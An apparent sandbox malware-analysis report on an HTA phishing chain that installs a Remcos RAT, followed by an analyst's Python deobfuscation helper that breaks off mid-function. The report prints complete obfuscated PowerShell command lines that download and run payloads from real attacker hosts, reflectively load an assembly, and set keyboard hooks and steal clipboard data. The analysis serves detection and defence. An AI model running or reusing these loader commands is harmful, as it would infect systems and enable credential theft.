                    Source: Yara match | File source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match | File source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara match | File source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                    Privilege Escalation

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00406764 _wcslen,CoGetObject,18_2_00406764

                    Phishing

                    Source: Yara match | File source: seethebestthignswhichgivingbestopportunities.hta, type: SAMPLE
                    Source: unknown | HTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.7:49713 version: TLS 1.2
                    Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1302780296.00000000034A8000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: q;C:\Users\user\AppData\Local\Temp\2c1bgmxj\2c1bgmxj.pdb source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1310602122.0000000008B14000.00000004.00000020.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000010.00000002.1715001566.0000000006DB0000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000010.00000002.1715770079.000000000734B000.00000004.00000800.00020000.00000000.sdmp
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040B335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,18_2_0040B335
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0041B42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose,18_2_0041B42F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0040B53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,18_2_0040B53A
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_0044D5E9 FindFirstFileExA,18_2_0044D5E9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_004089A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8,18_2_004089A9
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00406AC2 FindFirstFileW,FindNextFileW,18_2_00406AC2
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00407A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8,18_2_00407A8C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00418C69 FindFirstFileW,FindNextFileW,FindNextFileW,18_2_00418C69
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00408DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,18_2_00408DA7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe | Code function: 18_2_00406F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,18_2_00406F06

                    Software Vulnerabilities

                    Source: C:\Windows\SysWOW64\wscript.exe | Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                    Networking

                    Source: Network traffic | Suricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.7:49699 -> 192.3.220.29:80
                    Source: Network traffic | Suricata IDS: 2858796 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M1 : 192.168.2.7:49765 -> 192.3.220.29:80
                    Source: Network traffic | Suricata IDS: 2020424 - Severity 1 - ET EXPLOIT_KIT Unknown EK Landing Feb 16 2015 b64 2 M1 : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network traffic | Suricata IDS: 2020425 - Severity 1 - ET EXPLOIT_KIT ReverseLoader Base64 Payload Inbound M2 : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network traffic | Suricata IDS: 2036594 - Severity 1 - ET JA3 Hash - Remcos 3.x/4.x TLS Connection : 192.168.2.7:49773 -> 192.3.101.149:6946
                    Source: Network traffic | Suricata IDS: 2057635 - Severity 1 - ET MALWARE Reverse Base64 Encoded MZ Header Payload Inbound : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network traffic | Suricata IDS: 2858295 - Severity 1 - ETPRO MALWARE ReverseLoader Base64 Encoded EXE With Content-Type Mismatch (text/plain) : 192.3.220.29:80 -> 192.168.2.7:49765
                    Source: Network traffic | Suricata IDS: 2049038 - Severity 1 - ET MALWARE ReverseLoader Reverse Base64 Loader In Image M2 : 142.215.209.78:443 -> 192.168.2.7:49713
                    Source: Malware configuration extractor | URLs: banaya.duckdns.org
                    Source: unknown | DNS query: name: banaya.duckdns.org
                    Source: global traffic | HTTP traffic detected: GET /api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_T35w&pk_vid=fd4f614bb209c62c1730945176a0904f HTTP/1.1 | Host: 1017.filemail.com | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /45/HDRDDG.txt HTTP/1.1 | Host: 192.3.220.29 | Connection: Keep-Alive
                    Source: global traffic | HTTP traffic detected: GET /json.gp HTTP/1.1 | Host: geoplugin.net | Cache-Control: no-cache
                    Source: Joe Sandbox View | IP Address: 192.3.220.29 192.3.220.29
                    Source: Joe Sandbox View | IP Address: 142.215.209.78 142.215.209.78
                    Source: Joe Sandbox View | IP Address: 192.3.101.149 192.3.101.149
                    Source: Joe Sandbox View | IP Address: 178.237.33.50 178.237.33.50
                    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox View | ASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
                    Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                    Source: Network traffic | Suricata IDS: 2803304 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern HCa : 192.168.2.7:49779 -> 178.237.33.50:80
                    Source: global traffic | HTTP traffic detected: GET /45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF HTTP/1.1 | Accept: */* | Accept-Encoding: gzip, deflate | User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) | Host: 192.3.220.29 | Connection: Keep-Alive
                    Source: unknownTCP traffic detected without corresponding DNS query: 192.3.220.29 (this entry is repeated 50 times in the report)
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 1_2_04EC4B90 URLDownloadToFileW,1_2_04EC4B90
                    Source: global trafficDNS traffic detected: DNS query: 1017.filemail.com
                    Source: global trafficDNS traffic detected: DNS query: banaya.duckdns.org
                    Source: global trafficDNS traffic detected: DNS query: geoplugin.net
                    Source: powershell.exe, 00000001.00000002.1424337882.0000000007ABE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehaving
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF
                    Source: powershell.exe, 00000001.00000002.1414653804.00000000053ED000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF0J/
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIF9LMEM
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFC:
                    Source: powershell.exe, 00000001.00000002.1423686161.0000000007A23000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.3.220.29/45/seehavingfacingbestthignstogetmebackwithentiretimegreat.tIFn
                    Source: powershell.exe, 00000003.00000002.1310086977.0000000008AA2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoftG
                    Source: CasPol.exe, CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpSystem32
                    Source: CasPol.exe, 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gpl
                    Source: powershell.exe, 00000003.00000002.1303936513.000000000584F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://go.micros
                    Source: powershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                    Source: powershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051B3000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                    Source: powershell.exe, 00000003.00000002.1310452454.0000000008AF0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.W?7
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com
                    Source: powershell.exe, 00000010.00000002.1669609816.0000000002B49000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu45t7BU1kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6S
                    Source: powershell.exe, 0000000E.00000002.2079393910.00000000051DA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6LR
                    Source: powershell.exe, 00000001.00000002.1414653804.0000000005041000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1303936513.0000000005371000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000E.00000002.2079393910.00000000051F5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000004C61000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
                    Source: powershell.exe, 00000003.00000002.1303936513.00000000054C6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/winsvr-2022-pshelp
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                    Source: powershell.exe, 00000010.00000002.1672099112.0000000004DB8000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                    Source: powershell.exe, 00000001.00000002.1414653804.000000000550D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
                    Source: powershell.exe, 00000001.00000002.1421144583.00000000060A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1306026171.00000000063D9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                    Source: mshta.exe, 00000000.00000003.1257089016.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290146069.0000000006670000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242645805.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1273166507.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255793912.00000000074F0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1264355476.0000000006FD0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251530852.0000000007041000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1259885383.00000000070AC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1242578602.0000000007446000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250574154.0000000006827000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1250014151.00000000067C8000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1282036247.00000000056B2000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1271739816.0000000006833000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252695052.00000000066F0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1251672134.00000000056B3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255340938.00000000074B0000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1283281228.00000000066E9000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252283963.000000000675C000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1255426669.0000000007440000.00000004.00000800.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1290936484.0000000007040000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1252470032.00000000066E9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.html-code-generator.com
                    Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
                    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
                    Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.7:49713 version: TLS 1.2

                    Key, Mouse, Clipboard, Microphone and Screen Capturing

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004099E4 SetWindowsHookExA 0000000D,004099D0,0000000018_2_004099E4
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWindows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_004159C6 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,CloseClipboard,OpenClipboard,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard,18_2_004159C6
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_00409B10 GetForegroundWindow,GetWindowThreadProcessId,GetKeyboardLayout,GetKeyState,GetKeyboardState,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,ToUnicodeEx,18_2_00409B10
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR

                    E-Banking Fraud

                    barindex
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 16.2.powershell.exe.93565d0.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 18.2.CasPol.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000012.00000002.3680666998.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C14000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3693144012.00000000027BE000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000C39000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000012.00000002.3689257366.0000000000BF8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1721296304.0000000009356000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000010.00000002.1672099112.0000000005CC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 7724, type: MEMORYSTR
                    Source: Yara matchFile source: Process Memory Space: CasPol.exe PID: 8052, type: MEMORYSTR
                    Source: Yara matchFile source: C:\ProgramData\remcos\logs.dat, type: DROPPED

                    Spam, unwanted Advertisements and Ransom Demands

                    barindex
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeCode function: 18_2_0041BB77 SystemParametersInfoW,18_2_0041BB77

                    System Summary

                    barindex
                    Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WiNdowsPowErshELL\V1.0\PoWersHeLl.exe" "POWerSHelL.eXE -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT ; INVokE-EXpreSSIOn($(iNVOke-eXPResSIon('[systEM.teXt.Encoding]'+[cHAR]58+[CHaR]0X3A+'uTF8.GeTsTring([SySTEM.CoNveRT]'+[CHar]58+[cHar]0X3a+'frombASe64StRing('+[chAr]34+'JDV0ZiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZW1CZXJEZWZJbklUaW9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUY2tWTGosc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIFZJVixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgRVhsblBKcnBOUWMsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBiRWp6LEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5WlZTc0RNZGRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJpQXl3bmkiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OQU1lU1BhQ2UgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSXJSeiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICQ1dGY6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4yMjAuMjkvNDUvc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmVhdC50SUYiLCIkRU5WOkFQUERBVEFcc2VlaGF2aW5nZmFjaW5nYmVzdHRoaWduc3RvZ2V0bWViYWNrd2l0aGVudGlyZXRpbWVncmUudmJTIiwwLDApO3N0QXJULXNsRUVwKDMpO0lFWCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOdjpBUFBEQVRBXHNlZWhhdmluZ2ZhY2luZ2Jlc3R0aGlnbnN0b2dldG1lYmFja3dpdGhlbnRpcmV0aW1lZ3JlLnZiUyI='+[chaR]34+'))')))"
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Ex bYPAsS -NOp -W 1 -C dEvICeCredEntIaldepLoYmENT
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $verBoSeprEFereNCe.TOstrInG()[1,3]+'X'-JOiN'')(('opiimageUrl = ifdhttps://1017.filemail.com/api/file/get?filekey=2Aa_bWo9Reu4'+'5t7BU1kVgsd9pT9pgSSlvStGrnTICfFh'+'mTKj3LC6SQtIcOc_T35w&pk_vid='+'fd4f614bb209c62c1730945176a0904f ifd;opiwebClient = New-Object System.Net.WebClient;opiimageBytes = opiwebClient.DownloadData(opiimageUrl);opiimageText = [System.Text.Encoding]::UTF8.GetString(o'+'piimageBytes);opistartFlag = ifd<<BASE64_START>>ifd;opiendFlag = ifd<<BASE64_END>>ifd;opistartIndex = opiimageText.IndexOf(o'+'pis'+'tartFlag);opiendIndex = opiimageText.IndexOf(opiendFlag);opistartIndex -'+'ge 0 -and opiendIndex -gt opistartInde'+'x;opistartIndex += opistartFlag.Length;op'+'ibase64Length = opiendIndex - opistartIndex;opibase64Command = opiimageText.Subst'+'ring(opistart'+'Index, opibase64Length);opibase64Reversed = -jo'+'in (opibase64Command.ToCharArray() 0Q'+'l ForEach-Object { opi_ })['+'-1..-(opibase64Command.Length)];opicommandBytes = [Sy'+'stem.Conv'+'e'+'rt]::FromBase'+'64String(opibase64Reversed);opiloadedAssembly = [System.Reflectio'+'n.Assembly]::Load(opicommandBytes);opivaiMethod = [dnlib.IO.Home].GetMethod(if'+'dVAIifd'+');opivaiMethod.Invoke(opinull, @(ifdtxt.GDDRDH/54/92.'+'022.3.291//:ptthifd, ifddesativadoifd, ifddesativadoifd, ifddesativadoifd, ifdCasPolifd, ifddesativ'+'ado'+'ifd, ifddesat'+'ivadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesativadoifd,ifddesat'+'ivadoifd,ifd1ifd,ifddesativadoif'+'d));').rePLACe('0Ql',[StrinG][ChAr]124).rePLACe('ifd',[StrinG][ChAr]39).rePLACe(([ChAr]111+[ChAr]112+[ChAr]105),'$'))"
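The stage-two PowerShell above (the `-windowstyle hidden ... [System.Reflection.Assembly]::Load` command) fetches a text carrier from 1017.filemail.com, cuts out whatever sits between `<<BASE64_START>>` and `<<BASE64_END>>`, reverses that string, base64-decodes it, loads the result as a .NET assembly and calls `dnlib.IO.Home.VAI` with its next-stage URL written backwards (`txt.GDDRDH/54/92.022.3.291//:ptth`, which the GET /45/HDRDDG.txt request above confirms). The command line itself is only readable after its `'...'+'...'` pieces are joined and the three `.Replace()` calls (`0Ql` to `|`, `ifd` to `'`, `opi` to `$`) are applied. The Python below is an added analyst helper, not code from the report, from Joe Sandbox or from the malware: it undoes that `.Replace()` chain, extracts a payload from a carrier the same way the loader does, decodes the reversed URL, and flags reversed-base64 PE blobs by their `QqVT` tail (base64 of the bytes `MZ\x90` is always `TVqQ`). The carrier text, the MZ-headed blob inside it and the `example.invalid` URL in the obfuscation sample are constructed for this example; the tail check is a heuristic of my own and not a transcription of any Suricata rule.

```python
import base64
import re

# Marker strings and the .Replace() table are taken from the stage-two
# PowerShell command line shown in the report.
START_FLAG = "<<BASE64_START>>"
END_FLAG = "<<BASE64_END>>"
REPLACE_CHAIN = (("0Ql", chr(124)),   # '|'  pipeline operator
                 ("ifd", chr(39)),    # "'"  string quotes
                 ("opi", "$"))        # '$'  variable sigil

# base64(b"MZ\x90") is always "TVqQ", so a base64 PE stored reversed ends
# in "QqVT". Heuristic only (assumption), not a copy of any IDS rule.
REVERSED_MZ_TAIL = "QqVT"


def deobfuscate_command(obfuscated: str) -> str:
    """Rebuild the readable script: join the '...'+'...' pieces the way
    PowerShell evaluates them, then apply the three replacements in order."""
    joined = re.sub(r"'\+'", "", obfuscated)
    for needle, replacement in REPLACE_CHAIN:
        joined = joined.replace(needle, replacement)
    return joined


def decode_reversed_url(reversed_url: str) -> str:
    """The loader hands its next-stage URL to the assembly reversed."""
    return reversed_url[::-1]


def extract_reversed_payload(carrier_text: str) -> bytes:
    """Cut the text between the markers, reverse it and base64-decode it,
    which is what the loader does before [Reflection.Assembly]::Load()."""
    start = carrier_text.find(START_FLAG)
    end = carrier_text.find(END_FLAG)
    if start < 0 or end <= start:
        raise ValueError("payload markers missing or out of order")
    start += len(START_FLAG)
    reversed_b64 = carrier_text[start:end]
    # .NET FromBase64String ignores whitespace; b64decode's default
    # (validate=False) discards non-alphabet characters the same way.
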